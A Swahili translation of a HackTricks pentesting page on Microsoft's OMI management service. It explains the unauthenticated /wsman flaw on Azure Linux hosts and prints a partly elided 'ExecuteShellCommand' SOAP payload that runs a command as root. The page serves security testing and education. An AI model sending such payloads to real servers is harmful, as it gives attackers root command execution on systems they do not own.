5985,5986 - Pentesting OMI

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)!

Taarifa Msingi

OMI inawakilishwa kama chombo cha chanzo wazi kilichoundwa na Microsoft, kwa ajili ya usimamizi wa usanidi wa kijijini. Ni muhimu sana kwa seva za Linux kwenye Azure ambazo hutumia huduma kama vile:

  • Azure Automation

  • Azure Automatic Update

  • Azure Operations Management Suite

  • Azure Log Analytics

  • Azure Configuration Management

  • Azure Diagnostics

Mchakato wa omiengine unaanzishwa na kusikiliza kwenye interface zote kama root wakati huduma hizi zinapoamilishwa.

Bandari za chaguo-msingi zinazotumiwa ni 5985 (http) na 5986 (https).

Kama ilivyoonekana tarehe 16 Septemba, seva za Linux zilizowekwa kwenye Azure na huduma zilizotajwa ziko hatarini kutokana na toleo lenye udhaifu la OMI. Udhaifu huu unapatikana katika namna OMI server inavyoshughulikia ujumbe kupitia kielelezo cha /wsman bila kuhitaji kichwa cha Uthibitishaji, kuidhinisha mteja kwa njia isiyosahihi.

Mshambuliaji anaweza kutumia hii kwa kutuma mzigo wa SOAP wa "ExecuteShellCommand" bila kichwa cha Uthibitishaji, kuwalazimisha seva kutekeleza amri kwa mamlaka ya root.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Kwa habari zaidi kuhusu CVE hii angalia hapa.

Marejeo

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Last updated